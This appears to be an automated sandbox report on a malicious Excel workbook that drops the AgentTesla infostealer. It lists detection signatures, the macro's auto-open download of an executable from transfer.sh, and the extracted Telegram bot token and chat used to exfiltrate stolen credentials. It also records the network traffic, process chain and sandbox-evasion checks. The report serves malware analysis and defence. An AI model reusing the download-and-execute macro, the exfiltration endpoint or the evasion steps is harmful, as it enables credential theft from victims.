Windows Analysis Report
00001.LPCD2022.xls

Overview

General Information

Sample Name: 00001.LPCD2022.xls
Analysis ID: 605526
MD5: eccc1d5afe2f72a48203944b1abf01a3
SHA1: 32597a76c5e04fa67b6199bc9817ebdb9e1b7f71
SHA256: 6122dce9933f03479b3d98aea0785ae26737644262ac9ee8a67cbfbf11050f13
Tags: xls

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Yara detected AgentTesla
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Creates processes via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Document contains an embedded VBA macro which may execute processes
Office process drops PE file
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for dropped file
Document contains an embedded VBA with hexadecimal encoded strings
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document contains an embedded VBA macro which executes code when the document is opened / closed
Yara detected Credential Stealer
Sigma detected: Excel Network Connections
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Sigma detected: Autorun Keys Modification

Classification

AV Detection

Source: 3.2.RegSvcs.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5019146869", "Chat URL": "https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument"}
Source: dropped.exe.1980.2.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendMessage"}
Source: 00001.LPCD2022.xls Virustotal: Detection: 60%
Source: 00001.LPCD2022.xls ReversingLabs: Detection: 60%
Source: 00001.LPCD2022.xls Avira: detected
Source: C:\Users\user\AppData\Local\Temp\dropped.exe ReversingLabs: Detection: 57%
Source: 00001.LPCD2022.xls Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Joe Sandbox ML: detected
Source: 3.0.RegSvcs.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.3.unpack Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.2.unpack Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.1.unpack Avira: Label: TR/Spy.Gen8
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: Binary string: RegSvcs.pdb source: BINGO.exe, BINGO.exe, 00000006.00000000.959068378.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe, 00000006.00000002.961292531.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe.3.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: dropped.exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\dropped.exe
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:443
Source: global traffic DNS query: name: transfer.sh

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195bfbe5defb Host: api.telegram.org Content-Length: 1036 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195d3e2a38cb Host: api.telegram.org Content-Length: 5245 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195f7a6800de Host: api.telegram.org Content-Length: 945 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195fc1ea40be Host: api.telegram.org Content-Length: 108279 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da196245dad951 Host: api.telegram.org Content-Length: 112430 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da19651155316a Host: api.telegram.org Content-Length: 112590 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da1967dccd5f5c Host: api.telegram.org Content-Length: 112590 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da196aa84ed922 Host: api.telegram.org Content-Length: 112587 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da196f7fa188b0 Host: api.telegram.org Content-Length: 112587 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da19703f385b46 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da19730abb6823 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da1975d63c36dc Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da1978a1b83814 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da197b6d36fee5 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da197e38b4cb02 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da198104356572 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da1983cfbb680e Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da19869b38ef92 Host: api.telegram.org Content-Length: 116893 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da198966b6e37b Host: api.telegram.org Content-Length: 116893 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da198c3235a9de Host: api.telegram.org Content-Length: 116893 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da198efdb17ad0 Host: api.telegram.org Content-Length: 116893 Expect: 100-continue Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: global traffic HTTP traffic detected: GET /Uv5XFY/0000.LPCD2022.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: transfer.sh
Source: Joe Sandbox View IP Address: 144.76.136.153
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://GCHNJv.com
Source: RegSvcs.exe, 00000003.00000002.1171424229.000000000251B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://Kcwgjt6COc07kGTRi1sQ.net
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.1171298576.00000000007E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%appdata
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: dropped.exe, 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocumentdocument-----
Source: RegSvcs.exe, 00000003.00000002.1171520335.000000000259A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.orgP
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: transfer.sh
Source: unknown HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195bfbe5defb Host: api.telegram.org Content-Length: 1036 Expect: 100-continue Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API IServerXMLHTTPRequest2.Open("GET","https://transfer.sh/Uv5XFY/0000.LPCD2022.exe",False) Name: cjpojbxatghyew
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API Stream.Open() Name: cjpojbxatghyew
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API Stream.Write(<binary data omitted>) Name: cjpojbxatghyew
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, found possibly 'ADODB.Stream' functions open, savetofile, write Name: cjpojbxatghyew
Source: 3.2.RegSvcs.exe.400000.0.unpack, <PrivateImplementationDetails>{E06C67C6-90A7-4E02-867A-6F10B628DD48}/E359CAF0-1D35-4165-8E86-F04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.4.unpack, <PrivateImplementationDetails>{E06C67C6-90A7-4E02-867A-6F10B628DD48}/E359CAF0-1D35-4165-8E86-F04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.0.unpack, <PrivateImplementationDetails>{E06C67C6-90A7-4E02-867A-6F10B628DD48}/E359CAF0-1D35-4165-8E86-F04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.3.unpack, <PrivateImplementationDetails>{E06C67C6-90A7-4E02-867A-6F10B628DD48}/E359CAF0-1D35-4165-8E86-F04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.2.unpack, <PrivateImplementationDetails>{E06C67C6-90A7-4E02-867A-6F10B628DD48}/E359CAF0-1D35-4165-8E86-F04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 00001.LPCD2022.xls OLE, VBA macro line: Set zntkkzkmzqhln = jupwigkjmzusaimuh.SpawnInstance_
Source: VBA code instrumentation OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, API SWbemObjectEx.SpawnInstance_() Name: wdzlbznhf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\dropped.exe
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send, setrequestheader
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send, setrequestheader Name: cjpojbxatghyew
Source: 00001.LPCD2022.xls OLE, VBA macro line: xdgiejom = Environ("TEMP") & "\" & xdgiejom
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String environ: xdgiejom = Environ("TEMP") & "\" & xdgiejom Name: cjpojbxatghyew
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/vzbprmttn' : found hex strings
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/yhrgaijdj' : found hex strings
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String 4d53584d4c322e5365727665
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String 4d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e542035
Source: VBA code instrumentation OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, String 77696e6d676d74733a5c5c
Source: VBA code instrumentation OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, String 77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57696e33325f
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00001.LPCD2022.xls OLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open Name: Workbook_Open
Source: 00001.LPCD2022.xls OLE indicator, VBA macros: true
Source: dropped.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\dropped.exe File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@6/4@26/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 00001.LPCD2022.xls OLE indicator, Workbook stream: true
Source: 00001.LPCD2022.xls Virustotal: Detection: 60%
Source: 00001.LPCD2022.xls ReversingLabs: Detection: 60%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\dropped.exe C:\Users\user\AppData\Local\Temp\dropped.exe
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe "C:\Users\user\AppData\Roaming\BINGO\BINGO.exe"
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6086.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Mutant created: \Sessions\1\BaseNamedObjects\xpKNGhplpShlV
Source: 3.2.RegSvcs.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.4.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\dropped.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
